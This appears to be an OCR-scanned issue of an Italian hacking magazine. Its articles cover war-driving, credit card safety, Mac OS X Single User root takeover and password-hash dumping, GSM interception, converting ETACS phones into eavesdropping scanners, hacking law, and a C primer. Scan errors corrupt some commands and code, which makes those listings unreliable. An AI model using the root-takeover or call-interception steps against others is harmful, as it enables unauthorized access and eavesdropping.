iniziale sui war-dialer? Ebbene, negli ultimi 
tempi si va diffondendo una tecnica di 
Hacking chiamata war-driving e che 
sposa la tecnologia Wi-Fi con il con- 
cetto dei war-dialer. In pratica, alcune 
persone stanno cominciando a fare lenti 
giri in macchina, armati di notebook con 
scheda Wi-Fi. Quando rilevano la presen- 
za di una stazione base nei paraggi, attra- 
verso dei software in grado di sniffare il 
traffico via etere, segnano la posizione su 
una mappa. Se poi la stazione base non è 
protetta da alcun sistema di autenticazione 
o crittografia, può diventare il punto da cui 
navigare in modo gratuito, completamen- 
te anonimo e -in caso di un collegamento 
a Internet con Adsl o fibra ottica- persino a 
larga banda. 

In realtà, molti dei proprietari di stazio- 
ne base acconsentono a condividere le 
proprie risorse con chi si trova a passare 
nelle vicinanze, e qualche azienda usa 
questi argomenti per attrarre clienti 
(per esempio, le caffetterie Starbucks negli 
Stati Uniti o alcuni negozi della catena 
Mondadori Informatica dalle nostre parti). 
Come al solito, la tecnologia precorre le 
leggi, e nessuno sa cosa si rischia se si uti- 
lizza una stazione radio aperta (potrebbe 
capitare anche in modo involontario: si 



passa vicino a una stazione base, in quel 
momento il programma di posta cerca di 
scaricare la posta e -track- la connessione 
è effettuata. Di certo invece, cercare di su- 
perare le protezioni o sniffare il traffico con 
programmi come AirSnort, è sicuramente 
un reato punibile. 

Come ogni strumento tecnologico, 
questi sistemi dovrebbero essere usati con 
cognizione di causa: se non si utilizzano 
protezioni adeguate (autenticazione del- 
l'accesso e crittografia), un malintenzionato 
potrebbe infatti intercettare comunicazioni 
riservate, accedere a dati e risorse azien- 
dali o comunque private, e persino com- 
piere dei reati con la certezza di non poter 
essere individuato, m 



E LA SICUREZZA... 
FINISCE NEL GESSO! 

Si dice che i vagabondi utilizzino dei 
segni convenzionali tracciati con il 
gesso sui marciapiedi per segnalare 
agli amici la presenza di risorse utili 
(case disabitate, acqua, ripari) o 
pericoli (cani, sorveglianza, allarmi). 
Ebbene, il sito inglese 

propone dei 
simboli da tracciare vicino a stazioni 
base, per indicare la loro presenza 
e le caratteristiche principali 
(velocità, parametri di 
autenticazione, crittografia). La cosa 
sta riscuotendo molto interesse in 
rete, ma pare avere molto meno 
successo per le strade delle città. 
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COME FUNZIONANO LE TRANSAZIONI PER GLI ACQUISTI ONLINE 



Carta di credito e Internet 
una relazione pericolosa? 

Anche se in tanti hanno paura di inuiare uia Internet il proprio numero 
di carta di credito, con la maggior parte dei siti di e-commerce si è più 
al sicuro che al ristorante o in coda al bancomat. H patto di uerificare bene 
a chi stiamo consegnando i nostri soldi. 




e molteplici possibilità offerte 
dalla rete hanno creato nuove 
soluzioni che permettono ad 
aziende, negozi, banche e for- 
nitori di servizi di avere un rap- 
porto diretto con il consumatore, indipen- 
dente da distributori o intermediari e dal 
luogo fisico in cui si trova il cliente. Lo stru- 
mento che meglio si è adattato alla confor- 
mazione di Internet è senza dubbio la carta 
di credito: una serie di numeri che ci con- 
sentono di comprare online beni e servizi, 
pagandoli direttamente da casa nostra. Il 
sistema è certamente più comodo che effet- 
tuare un bonifico bancario o un versamen- 
to in contanti su un conto corrente postale. 
Sono però ancora in molti a diffidare 
profondamente dall'uso della carta 
di credito online. 
Indipendentemente dal ti- 
po di beni o servizi acqui- 
stati, il funzionamento di 
questo tipo di transazio- 
ne è il medesimo: si forni- 
scono al merchant (colui che ci sta ven- 
dendo qualcosa) tutti i dati richiesti e questo 
provvedere ad avviare la procedura presso 
il gestore della carta di credito. 
La schietta semplicità con cui si pos- 
sono spendere soldi in Internet, pe- 
rò, lascia spazio a una serie di legit- 
time perplessità, che in molti casi 
spingono l'utente finale a lasciare la 
propria Visa o Mastercard al sicuro 
nel portafogli. 

La prima domanda che viene posta di fron- 
te alla possibilità di un pagamento con car- 
ta di credito è la solita: "ma non c'è la pos- 





sibilità che qualcuno possa venire in pos- 
sesso dei dati sensibili della mia carta?" 
La risposta, da un punto di vista logico, non 
può che essere affermativa: questa possibi- 
lità esiste. Rimane ovviamente da verificare 
il reale fattore di rischio rappresentato dal 
dover postare numeri e date di scadenza 
tramite un form di qualche sito. 



» Come funziona 

La maggior parte delle transazioni viene 
gestita da banche e istituti specializzati nel 
commercio via rete, i quali nella stragrande 
maggioranza dei casi aderiscono a deter- 
minati standard di sicurezza. 
Prendiamo l'esempio di uno dei primi e più 
diffusi gestori di transazioni internet: Banca 
Sella. Esistono molte altre banche che offro- 
no soluzioni per il commercio elettronico, 
ma dato il fatto che, come già detto, il 99% 



delle procedure sono standardizzate l'e- 
sempio di Banca Sella ci permetterà di ca- 
pire come funziona questo tipo di commer- 
cio in modo non dissimile da come esso 
viene implementato da molti altri gestori. 
Una volta scelti i prodotti da acquistare da 
un ipotetico sito di e-commerce, tanto per 
fare un esempio qualsiasi, l'utente si trova 
di fronte alla pagina che gli chiede in che 
modo egli desideri effettuare il pagamento: 
tralasciando tutta una serie di altri metodi (il 
classico bonifico bancario, o i più sofisticati 
pagamenti tramite carta GSM) arriviamo a 
quello che ci interessa: la connessione con 
carta di credito. Una volta compilato il form 
sulla pagina, l'utente premerà sul solito bot- 
tone "Invia": da qui in poi tutta la transazio- 
ne passa sui server della banca. La trasmis- 
sione dei dati avviene dunque in varie fasi: 
dapprima l'utente fornisce al merchant tutti 
gli estremi necessari a completare la trans- 
azione, poi tali dati vengono inviati dal ser- 
ver del merchant a quelli della banca. 
La connessione tra il merchant e il 
server della banca avviene ovvia- 
mente in rispetto di 
elevati standard di si- 
curezza: tutto quello che 
passa tra i due estremi 
della transazione è di- 
fatti criptato in SSL3 a 
1 28 bit, garantendo che nessu- 
no possa interferire nella comunicazione 
tra le due macchine per, ad esempio, risali- 
re ai dati della carta ed usarla per scopi il- 
leciti. Nel caso di Banca Sella (ma la situa- 
zione è analoga a molti altri sistemi di pa- 
gamento digitali) il merchant installerà sul 
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proprio server una classe java atta proprio 
a questo processo di cifratura: la chiave vie- 
ne generata quoitidianamente dai server di 
Banca Sella. 

Tutti i parametri vengono dunque 
trasferiti in modo sicuro, e ad au- 
mentare questo livello di sicurezza 
viene introdotto anche un controllo 
incrociato sull' indirizzo IP 
del chiamante; in modo da 
rendere praticamente impos- 
sibili tentativi di dirottamen- 
to della connessione e con- 
seguenti sniffing delle variabili. Esi- 
stono poi tutta una serie di strumenti post- 
transazione che confermano all'utente e al 
merchant il buon esito del pagamento: tra- 
mite questa reportistica vengono dunque 
abbassati sensibilmente i rischi di transazio- 
ni reiterate, ovvero l'erronea ripetizione di 
un pagamento (magari dovuta ad una con- 
nessione lenta e al conseguente doppio o 
triplo clic dell'utente sul bottone Invio del 
form). 




» In definitiua 



Quando questa passa per istituti certificati e 
attendibili, le transazioni con carte di credito 
non portano con sé rischi maggiori di quelli 
che corriamo durante un normale acquisto 
in un negozio: in pochi ci pensano, forse, 
ma se il commesso che maneggia la nostra 
carta ha l'occhio abbastanza rapido non ci 
metterà molto a compilarsi una bella lista di 
carte utilizzabili, magari pro- 
prio su internet. 
Rimangono, è vero, tutti 
quei siti e sitarelli che, 
non appoggiandosi su 
nessun altro al di fuori di 
se stessi, consentono comunque il 
pagamento mediante carta di 
credito, molto spesso tramite la compila- 
zione di un form che magari viene sempli- 
cemente inviato tramite email al merchant: 
in questi casi, se proprio dobbiamo proce- 
dere all'acquisto, è bene perdere qualche 
minuto per informarci su chi ci sta offrendo 
cosa, e se valga davvero la pena rischiare 
che la propria Visa venga usata da ragazzi- 
ni di mezzo mondo per pagarsi l'accesso a 
qualche sito porno. Tanto più che è ancora 
abbastanza recente la vicenda di un sito 




web, che pubblicizzava una fantomatica 
azienda che offriva ricariche per cellulari a 
metà prezzo, e che altro non era che uno 
specchietto per le allodole in grado di 
rastrellare dalle tasche di centinaia di 
utenti alquanto sprovveduti moltissi- 
mi numeri validi di carte di credito. Fa- 
te quindi attenzione quando vi accingete a 
comprare qualcosa in rete: la comodità di 
poter effettuare delle transazioni comoda- 
mente da casa propria necessita anche di 
una minima dose di buon senso. La regola 
generale resta quella di non accettare cara- 
melle dagli sconosciuti, m 







www.bancasella.it dedicata ai siti che offrono 
prodotti e servizi da pagare con carta di credito. 



I passi dell'acquisto 

I passaggi di una transazione con 
carta di credito e banca di appoggio. 



Ìli server del merchant invia al browser 
del cliente un modulo con l'ordine di ac- 
quisto da compilare. 

211 cliente riempie il modulo e lo invia al 
sito del merchant. 

311 server del merchant invia il numero di 
carta di credito e l'importo al computer 
dell'istituto di credito per una verifica. 

L'istituto di credito invia al merchant 
una conferma della validità della carta 
e della copertura per l'importo selezionato. 

Il server del merchant invia al browser 
lell'utente una conferma dell'avvenuto 
acquisto. 



IL VERO 
PERICOLO 
E OFFLINE! 

Molti dicono di non 

fidarsi delle transazioni 

su Internet, ma spesso commettono 

delle sciocchezze che possono 

rivelare a qualsiasi sconosciuto il 

proprio numero di carta di credito. 



Mai gettare gli scontrini 
per strada 

Non solo aiuterete la vostra città 
a rimanere pulita, ma eviterete 
che qualcuno possa raccogliere 
lo scontrino, che quasi sempre 
riporta il numero e la data 
di scadenza della carta di credito, 
dati sufficienti ad acquistare 
qualsiasi cosa su Internet. 



Chiedete la verifica della firma 

Pochissimi commessi confrontano 
la firma sulla ricevuta con quella 
presente sul retro della carta 
di credito. Se vi capita una cosa 
simile, fatelo notare al commesso: 
magari la prossima volta si 
ricorderà di fare questa operazione. 
Un impiegato di banca ci ha 
candidamente confessato che a volte 
effettua dei pagamenti con la carta 
della moglie, firmando col nome 
di lei. Bella sicurezza! 



Al ristorante 

Invece di affidare la carta di 
credito al cameriere, andate a 
pagare in cassa. Eviterete che un 
dipendente scontento del suo lavoro 
possa fare una deviazione e copiare 
i dati della carta. 



In fila al Bancomat o alla cassa 

Quando siete in fila con altre 
persone, estraete la carta 
di credito solo all'ultimo momento, 
o coprite il numero con la mano. 
Ci sono persone che si allenano 
a memorizzare velocemente i dati, e 
si appostano in luoghi come questi 
per poterli carpire al volo. 
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COME DISABILITARE LA MODALITÀ SINGLE USER 
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PASSWORD 
IN CHIARO! 

Alcuni utenti di Mac 
OS X potrebbero 
ritrovarsi tra le 
proprie preferenze 
(in -/Library/Preferences) 
il file Finders Prefs. 
Già il nome è sospetto (perché 
il plurale di Finder?), ma se 
si osserva il file con un editor 
di testo, c'è di che 
preoccuparsi: cercando bene, si 
può vedere la password di 
amministratore, in chiaro! 
Questo costituisce un grave 
rischio per la sicurezza 
del sistema, perché una persona 
che avesse accesso fisico 
al computer, potrebbe leggere 
la password dell'amministratore. 
II colpevole non è Mac OS X, 
ma il programma MOX Optimize, 
che serve per abilitare 
funzioni nascoste e velocizzare 
il funzionamento del sistema. 
A causa di una programmazione 
maldestra, per poter funzionare 
MOX Optimize ha bisogno 
della password 
di amministrazione, 
e per non doverla più 
richiedere all'utente, 
la registra nel file 
incriminato. Chi tiene 
alla propria sicurezza, dovrebbe 
quindi cancellare il file e, 
se proprio vuole utilizzare MOX 
Optimize, inserire la password 
ogni volta. 
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Mac DS H a rischia: si può 

DIUENTHRE RDDT 

IN TRE MINUTI 

Per permettere agli utenti distratti di ritrouare 

la propria password, Hpple ha lasciata una parta aperta 

nella sicurezza di Mac OS X 




Essendo pensato per l'uso personale, 
Mac OS X ha due gravi carenze in 
termini di sicurezza: in primo luo- 
go, è possibile modificare la 
password di amministratore 
usando semplicemente il CD di instal- 
lazione. Se questo non bastasse, chiunque ha 
la possibilità di avere accesso al sistema 
come root semplicemente riawiando 
il Mac tenendo premuti i tasti Coman- 
cio+S, e senza che venga richiesta una pas- 
sword. In questo modo si entra infatti nella mo- 
dalità "Single User", una shell Unix senza inter- 
faccia grafica ma che ha libero accesso a ogni 
file, senza restrizione alcuna. 



» Cosa si rischia 



Dopo aver riavviato il computer tenendo pre- 
muto i tasti Comando (mela)+S, il malinten- 
zionato potrebbe montare il volume / con 
/sbin/mount -mi/. 

A questo punto, avvitati i servizi di rete con 
/sbin/SystemStarter, potrebbe cambiare la 
password di root con una a sua scelta, digi- 
tando passwd root e la nuova password. 

In questo caso, l'utente legittimo non 



potrebbe più collegarsi come root al 

proprio sistema. Le cose potrebbero però 
essere persino più gravi. Muovendosi senza 
problemi nel file system, l'attaccante potrebbe 
procurarsi i file con le password cifrate (o più 
semplicemente usare nidump passwd), per 
decifrarle con calma in un altro luogo, usando 
un attacco a forza bruta per decifrare l'hash 
della password. 

In questo modo, l'attaccante si sarebbe procu- 
rato le password senza compromettere il siste- 
ma in modo evidente, ed avrebbe accesso al 
computer in qualsiasi momento (anche da re- 
moto, se sono abilitati i servizi Telnet e ftp). 
Come nel caso della funzionalità del CD di in- 
stallazione, questa apparente "falla", è in real- 
tà una funzionalità prevista per permettere 
agli utenti con poca memoria di resettare una 
password dimenticata. 

Ciò non toglie che la falla nella sicurezza è 
importante, soprattutto se il Mac in que- 
stione viene messo a disposizione del 
pubblico (Internet cafè, negozi, stand 
fieristici...) 



» La soluzione 

Fortunatamente, qualcuno ha pensato di por- 
re rimedio a questo problema. Questo qual- 
cuno è Marukka, del Macintosh Security 
Group, che ha rilasciato una versione modifi- 
cata di un componente di Mac OS X, 
/mach_init, che impedisce il riavvio in mo- 
dalità Single User. La patch può essere 
scaricata da www.securemac.com/ 
disablemacosxsingleboot.php. 
Prima di installarla, occorre però prestare at- 
tenzione al fatto che si tratta di una modifica 
non supportata, e che la sua installazione non 
comporta la creazione di una copia di backup 
della precedente versione di machjnit, copia 
che conviene effetuare manualmente nel caso 
si volesse ripristinare la versione originale, cj 
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NUOVI E VECCHI ALGORITMI DI CIFRATURA PER I TELEFONI GSM 



CHI 9 SNIFFA il GSM? 



In attesa del nuouo metodo di codifica e cifratura 
del sistema di comunicazione GSM, uediamo come 
funziona il sistema attuale e come può essere uiolato 
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telefoni GSM dovrebbero 
presto diventare più sicuri, 
grazie all'introduzione di un 
nuovo sistema di cifratura, 

chiamato A5/3. Si tratta di 

una variante del precedente sistema A5, 
che utilizza però tre differenti algoritmi 
per codificare la conversazione, in modo 
che non possa essere ascoltata da terze 
persone (forze di polizia escluse, ovvia- 
mente). L'introduzione di un nuovo stan- 
dard di cifratura è una implicita con- 
ferma delle carenze del sistema 
precedente. 

La rete GSM è digitale, e questo per- 
mette di convertire i suoni in bit che non 
significano nulla se vengono "ascol- 
tati" da una semplice radio. In realtà, 
anche sintonizzandosi su un canale utiliz- 
zato dal sistema GSM e operando la con- 
versione inversa, da digitale ad analogi- 
co, ancora non si ottiene un segnale udi- 
bile. Su di un singolo canale radio vengo- 
no trasmesse in rapida sequenza le co- 
municazioni di 8 diversi utenti, e ogni 
conversazione cambia continuamente 
frequenza. Anche ammesso di riuscire a 
seguire una conversazione attraverso i 
suoi continui rimbalzi sui canali, rimane il 
problema della cifratura. Prima di esse- 
re trasmessi via etere i dati vengono 
cifrati utilizzando chiavi presenti nella sin- 
gola scheda SIM (l'IMSI, International Mo- 
bile Subscriber) e nel sistema di celle del 



gestore. La chiave della SIM è sempre la 
stessa, ma quella del gestore viene modi- 
ficata frequentemente. Se la comunicazio- 
ne tra telefono e cella è quindi piuttosto 
complessa da violare, le cose sono diverse 
nella comunicazione tra cella e centrale 
telefonica. Nella stragrande maggioranza 
dei casi, questa comunicazione avviene in 
chiaro per vie terrestri o con ponti a mi- 
croonde. Questa vulnerabilità è stata 
già dimostrata in passato, da un ricer- 
catore che ha vinto i 1 00.000 marchi te- 
deschi riuscendo a effettuare una chiama- 
ta a carico di un altro numero. 



» Intercettazioni 
in scatola 

La società americana Gcom Technolo- 
gies (www.gcomtech.com) produce un 
apparecchio in grado di intercettare ogni 
comunicazione di un determinato abbo- 
nato, effettuando un attacco di tipo "uo- 
mo nel mezzo". L'apparecchio è una sta- 
zione base GSM racchiusa in una scatola 
trasportabile. L'apparecchio fa credere 
al telefono GSM di essere la cella 
dell'operatore, e all'operatore si 
presenta invece con le "credenziali" 
dell'abbonato da intercettare. Abbona- 
to e operatore non notano nulla di strano, 
ma tutte le chiamate effettuate o ricevute 
dall'abbonato vengono registrate dall'in- 
fernale scatolotto. Il sistema viene vendu- 
to solo a rappresentanti di governi o delle 
forze di polizia che forniscano adeguate 
credenziali, ma non è improbabile che 
qualcuno possa impossessarsene illegal- 
mente, come accade con le armi, rà 



Stazione base: nella rete GSM di 
un gestore, sono le stazioni che 
comunicano con i telefoni e 
ritrasmettono alla centrale. 



TRASFORMARE 
IL CELLULARE 
IN UNO SCANNER 

Dicevamo che le 
comunicazioni ETACS 
possono essere 

intercettate molto facilmente 
utilizzando uno scanner 
di frequenze (che si può 
liberamente acquistare per poco 
più di 100 Euro, ma non si può 
utilizzare per intercettare 
illeqalmente le comunicazioni 
altrui) . In realtà, alcuni 
telefoni cellulari ETACS possono 
essere facilmente trasformati in 
uno scanner, visto 
che disponqono di un 
ricetrasmettitore che funziona 
sulle frequenze adeguate. 
Per esempio, con alcuni modelli 
ETACS di Motrorola basta aprire 
lo scomparto della batteria, 
infilare un pezzo di carta 
stagnola nel contatto centrale 
(solitamente abbassato rispetto 
al contatto presente sull'altro 
lato) , e riaccendere 
il telefono, che entrerà 
nella modalità Test. 
Premendo # si vedrà la scritta 
Tac5 sul display. Inserendo 08 
e poi nuovamente #, il 
telefonino si sarà trasformato 
in uno scanner. Dalla tastiera 
si potrà inserire un canale 
radio, compreso tra 1101 e 1199 
e, confermando con #, si avrà 
accesso alle chiamate effettuate 
nella cella in cui ci si trova. 
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LE RISPOSTE AI VOSTRI QUESTITI SU HACKING E LEGGE 



» Il portscanning 
è illegale? 



In tanti ci chiedete un parere sulla legittimità di certe pratiche 
hackereggianti, e noi ui diamn la nastra opinione. 
Ricordate perà che, nel dubbio, è meglio non rischiare! 



» Password banali 



La questione è controversa. Secondo 
qualcuno, esaminare le porte di un compu- 
ter collegato a Internet non è da conside- 
rarsi attività illegale, perché non causa al- 
cun danno ed equivale semplicemente a 
vedere quali servizi vengono resi disponibi- 
li da quel computer. 

Secondo altri esperti legali, però, il port- 
scanning può essere considerato come una 
serie di tentativi di accesso diretti a eviden- 
ziare le falle, e considerata quindi un reato. 

Il dibattito è aperto, e di certezze per ora 
non ce ne sono. Si sa che i provider stanno 
prendendo provvedimenti per contro pro- 
prio: Tiscali per esempio invia ai propri 
utenti un'email di diffida, con minaccia di 
soppressione dell'account. 

Ovviamente, molto dipende dalle mo- 
dalità del portscan. Se io effettuo il portscan 
su una classe ridotta di IP e su porte corri- 
spondenti ai servizi più comuni (25, 80, 
110, 8080), è abbastanza probabile che 
sto cercando dei servizi legittimi. 

Se, invece, eseguo portscan a tappeto, 
cercando le tipiche porte usate dai trojan, 
probabilmente sto cercando qualche buco 
in cui intrufolarmi illegalmente. Natural- 
mente tutto questo non vale se sto eseguen- 
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do il portscan su una macchina di cui ho il 
controllo, per verificarne il corretto funzio- 
namento e per vedere se ci sono delle por- 
te aperte. 



Se una persona penetra senza autoriz- 
zazione in un sito protetto da una password 
facilissima da indovinare, senza utilizzare 
alcun exploit o strumento di cracking, com- 
mette comunque reato? Certo: penetrare 
senza autorizzazione in un sito o area riser- 
vata protetta da password è comunque un 
reato, anche se la password è Pippo, il no- 
me della fidanzata del webmaster o quella 
di default (quante ce ne sono in giro...). 
O pensi forse che se vedi un auto con le 
chiavi nel cruscotto, puoi prenderla e farci un 
giro senza venire accusato di furto? 

Se poi l'intruso si appoggia a quel server 
per commettere danni ad altri, questi ultimi 
possono accusare il gestore di non aver 
preso contromisure adeguate, ma si tratta 
di tutt'altro problema. 

» Si può agire legalmente 
contro uno spammer? 

Sì che si può, ovviamente a patto di po- 
ter risalire alla sua identità. 

Questo è abbastanza facile quando lo 
spam arriva da aziende italiane facilmente 
identificabili. 

Per poter mandare posta spazzatura, 
queste aziende devono tenere dei database 
degli utenti, e ricadono quindi nell'ambito 
della legge sulla privacy (L. 675/1996). 
Uno degli articoli di questa legge stabilisce 
che ognuno di noi ha il diritto di sapere se 
un'azienda detiene dei dati che lo riguarda- 
no e di quali dati si tratti. 

Inoltre, ognuno può decidere di fare 
cancellare completamente i dati che lo ri- 
guardano. Per far valere i tuoi diritti, puoi 
scaricare il modulo per chiedere l'accesso ai 
propri dati dal sito del Garante per la pro- 
tezione dei dati personali (www.garante- 
privacy.it, poi vai su Modulistica e cerca il 
modello relativo all'articolo 13 della legge). 

Dopo aver compilato il modulo, spedi- 
scilo come raccomandata AR allo spam- 
mer, e anche in copia al Garante, m 



www . comunic-azione . ch/weblaw 

Sito svizzero, ma in lingua 
italiana, che si pone 
l'obiettivo di far crescere le 
conoscenze sugli aspetti legali 
dell'uso delle telecomunicazioni 
e di Internet in particolare. 
Proprio per questi suoi intenti 
didattici, gli argomenti sono 
spesso presentati in una forma 
adatta ai meno esperti. 



it . diritto . internet 

Un newsgroup dedicato agli 
aspetti legali dell'uso di 
Internet. È frequentato da molti 
avvocati, e spesso i messaggi 
sono scritti in legalese, 
difficile da comprendere, ma 
senza dubbio più affidabile di 
molti forum di discussione in 
cui ognuno dice la sua, ma con 
poca conoscenza di causa. 

www . ecn . org/cybr 

Da anni la mailing list Cyber 
Rights rappresenta un importante 
ambito di discussione sugli 
argomenti legati ai diritti dei 
cittadini del cyberspazio. Tra i 
frequentatori della lista ci 
sono alcuni dei pionieri 
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Uolete fare gli hacker ma andate in crisi quando si tratta 
di programmare il uideoregistratore? Ecco un articolo 
semplice semplice per comprendere Tabe del... linguaggio C 






Cominciamo in questo nume- 
ro a occuparci di program- 
mazione, argomento in sé 
complesso ma che cerchere- 
mo di affrontare in modo che 
sia comprensibile anche da chi è alle pri- 
me armi. Il linguaggio C è alla base di 
tantissimi strumenti utili a chi pasticcia 
con reti e sistemi: averne almeno un'infa- 
rinatura è quasi obbligatorio, e la confi- 
denza con questo linguaggio è una di 
quelle cose che fa la differenza tra un 
hacker già smaliziato e un novellino. 

Per presentare il linguaggio e, realiz- 
zeremo un paio di piccoli programmini. 
Iniziamo con uno molto semplice che mo- 
stra a video la scritta "Ciao a tutti! !". 

Programmare in e è molto intuitivo in 
quanto il linguaggio ha poche regole di 
scrittura e di forma. Guardando com'è 
fatto il nostro programma lo capirete su- 
bito. 

#include <stdio.h> 

mairi ( ) { 

printf P\nCiao atutti! ! \n") ; 

return 0; 



■ 



Se scrivete in un editor di testo queste 
righe, non succederà proprio nulla. Affin- 
ché un programma possa essere esegui- 
to, deve essere prima compilato, cioè tra- 
dotto da un formato comprensibile per gli 
uomini (il e), in uno che il computer possa 
maneggiare. Di questo si occupa un pro- 
gramma chiamato compilatore; il più fa- 
moso compilatore e per Linux è Gcc (Gnu 
C Compiler), ed è installato in modo pre- 
definito da quasi tutte le distribuzioni. Se 
avete Linux quindi, digitate: 

Gcc nomefile.c 



Per creare il file binario eseguibile, che 
potrà essere lanciato con: 

./nomefile 

Se invece usate Windows, dovrete sca- 
ricare e installare un compilatore. Il no- 
stro suggerimento è di utilizzare Borland 
Turbo C 2.01 , che è diventato gratuito. Lo 
potete scaricare da http://community.bor- 
land.com/museum (dopo aver compilato 
un noioso e lunghissimo modulo di regi- 
strazione). Dopo aver inserito il listato del 
programma in Turbo C, basterà premere 
ctrl+f9 per compilare il file eseguibile. 

Se avete fatto tutto correttamente, ve- 
drete apparire sullo schermo la scritta 
"Ciao a tutti! !", per poi tornare al prompt 
dei comandi. 



Ciao a tutti! ! 



Il risultato dell'esecuzione del primo listato. 

Vediamo ora il listato precedente, riga 
dopo riga, per avere un'idea di come ra- 
giona il e. 

Si parte con la scritta "#include 
<stdio.h>" questo comando dice al com- 
pilatore e di includere al sorgente che stria- 
mo scrivendo anche il file stdio.h, che sta 
per "standard input-output" (la h sta per 
header, per ora prendetelo per buono). 
Grazie a questo file avremo a disposizioni 
delle funzioni di base del linguaggio di 
programmazione, senza le quali il resto del 
programma non avrebbe avuto senso. Al- 
la seconda riga è presente la parola 
"main" seguita da una coppia di parente- 
si. Questa è una funzione. In particolare, 



main è il corpo del programma, e costi- 
tuisce la funzione base che deve essere 
sempre presente in tutti i programmi uten- 
te. Da main potranno poi essere chiama- 
te altre funzioni, create da noi con un no- 
me qualsiasi. 

Subito dopo main troviamo una pa- 
rentesi graffa, in questo caso aperta. 
Questo simbolo indica l'inizio di un bloc- 
co di istruzioni (funzioni, blocchi decisio- 
nali eccetera). Come si può intuire, la pa- 
rentesi graffa chiusa indica la fine del 
blocco di istruzioni. Ne troveremo sempre 
in grande quantità, anche perché, insie- 
me alle rientranze, aiutano a tenere ordi- 
nato il codice. 

PRINTF è una funzione definita in 
stdio.h, e che ci permette di mandare in- 
formazioni sul flusso video per la stampa 
su schermo. E questa riga del nostro pro- 
gramma che effettivamente compie il la- 
voro di stampare sullo schermo la frase 
"Ciao a tutti!!". 

\n è un carattere di controllo della fun- 
zione printfm, e serve per andare a capo in 
un certo punto della frase. 

Notiamo che a fine riga è presente un 
punto e virgola. Questo è necessario su 
ogni riga che contiene un comando specifi- 
co (funzioni e cicli non necessitano di que- 
sta formalità), e indica al compilatore la fi- 
ne dell'istruzione. 

Il nostro programma viene lanciato da 
un sistema operativo che in genere ha un 
controllo sulle applicazioni lanciate dall'u- 
tente. Per evitare problemi, bisogna inserire 
return che, come qualcuno può intuire, fa 
ritornare. Dove? Al prompt dei comandi. 
Salviamo il nostro programmino in un file 
chiamato Ciao. e e poi dopo la compilazio- 
ne otterremo il file eseguibile (Ciao.exe su 
Windows), pronto da provare. 
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Jn programma che esegua un cal< 
determinato, come per esempio 3 + 4, non 
ha molto senso. Il bello di un computer, e 
dei suoi programmi, è la possibilità di ese- 
guire funzioni e calcoli generalizzati, che si 
adattano a varie situazioni. Per esempio, un 
banale programma può eseguire la somma 
di due numeri, qualsiasi essi siano. Per fare 
ciò, è necessario un metodo per definire la 
funzione (somma due numeri) rappresen- 
tando il valore dei due numeri in una forma 
simbolica, generalizzabile. A questo servo- 
no le variabili, una sorta di contenitori che 
possono rappresentare numeri, stringhe di 
testo e altri tipi di dati. Se chiamo A il primo 
numero, e B il secondo, posso creare un 
programma la cui funzione principale sia 
qualcosa del tipo "A+B". Se in un qualche 
punto del programma prevedo la possibilità 
di assegnare ad A e a B valori qualsiasi, ot- 
tengo una calcolatrice che esegue somme. 
Nell'esempio che segue, creeremo una va- 
riabile x di tipo "int" (intero), cioè una varia- 
bile adatta a contenere un numero intero tra 
e 255 (con un totale di 256 casi, compre- 
so lo zero), e poi le assegneremo il valore 
(zero), le istruzioni necessarie saranno: 

intx; 
x=0; 



La disquisizione sulle variabili ci serve 
perché ora vogliamo fare in modo che il no- 
stro programmino stampi la stessa frase per 
dieci volte. In questo caso ci serviremo di un 
ciclo, cioè una sequenza di codice che viene 
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ripetuta fintanto che una certa condizione ri- 
sulta vera. Quando la condizione non è più 
vera, il flusso del programma "esce dal ciclo" 
ed esegue le istruzioni successive. Ecco co- 
me useremo il ciclo nel nostro programma: 

#include <stdio.h> 
mairi ( ) { 

int x; 

x=0; 

while (x<10) { 

printf ("\nCiao a tutti 

n° : %d", x); 

x++; 

} 

return 0; 

} 

Questo listato scrive la frase "Ciao a 
tutti" per dieci volte, indicando ogni volta 
un numero progressivo. Vediamo passo 
dopo passo il codice. 



_icLo.exe 



Il testo prodotto dall'esecuzione del 
secondo listato. 

Il programma è identico al precedente 
fino alla parola "int", che abbiamo visto ser- 
ve a definire una variabile x di tipo intero tra 
e 255. In seguito, a x viene assegnato il 
valore zero. While è una parola chiave che 
indica un ciclo (significa "finché" in inglese). 
Fin tanto che la condizione indicata nelle 
parentesi tonde è vera, il ciclo si ripeterà 
eseguendo le istruzioni indicate tra le pa- 
rentesi graffe. In questo caso, la condizione 
è rappresentata da x<l 0. Fintanto che x è 
minore di 1 0, verranno eseguite le istruzio- 
ni viste in precedenza per la stampa a vi- 
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deo. Guardando attentamente, si nota che 
il printf utilizzato qui è diverso dal caso pre- 
cedente. Vi troviamo infatti l'espressione di 
controllo "%d", che indica che in quel punto 
dovrà essere inserito il valore di una varia- 
bile, citata dopo le virgolette e preceduta da 
una virgola. Fermiamoci qui per un attimo, 
e passiamo alla riga successiva. L'espres- 
sione x++ prende la variabile x e la incre- 
menta di una unità (quindi, da questo pun- 
to in poi, x sarà uguale a x+ 1 ). 

Proviamo a fare un riassunto di quan- 
to visto finora: 

* viene definita una variabile x di tipo 
intero e uguale a zero. 

* fintanto che questa variabile è mi- 
nore di 10, il programma stampa sullo 
schermo la frase "Ciao a tutti", e accanto 
scrive l'attuale valore di x. 

* il valore di x viene incrementato di 1 . 

* il ciclo si chiude con la parentesi 
graffa, e quindi ricomincia dall'inizio. 

* dopo 1 cicli, x sarà uguale a 1 0, e la 
condizione indicata nell'espressione whi- 
le non sarà più vera. Il ciclo è quindi ter- 
minato, e l'esecuzione prosegue con le 
istruzioni successive. 

Come prima, salviamo il file con il no- 
me Ciclo. e e compiliamo ottenendo l'ese- 
guibile. Una volta avviato il programma, 
noteremo che il valore della variabile, 
perfettamente logico per il computer, per 
noi umani è un po' sgradevole: di solito 
infatti noi contiamo da 1 a 1 0, e non da 
a 9. Per ovviare a questo problema, basta 
inizializzare la variabile x su 1 anziché su 
0, e imporre come condizione x<l 1 . H 
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Abbiamo visto che l'espressione x++ serve 
a incrementare x di un'unità. Allo stesso 
modo, x- decremento x di uno. 
Inoltre, nell'esempio ciclo. e abbiamo utiliz- 
zato come condizione x<10. Ovviamente 
questa non è che una delle condizioni che si 
possono verificare. Ecco le più importanti: 

< minore di 

> maggiore di 

< = minore di o uguale a 

> = maggiore di o uguale a 
= = uguale a 

!= diverso da 



LE DEBOLEZZE DEL SERVIZIO DNS 




Il seruizio Dns, tanta importante per il funzionamento dell'intera Rete, 

ha dei problemi di sicurezza grauissimi. Ecco come un malintenzionato potrebbe 

approfittarne per i propri scopi. 
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Bind (Berkeley Internet Nome 
Domain) è la più comune im- 
plementazione del protocollo 
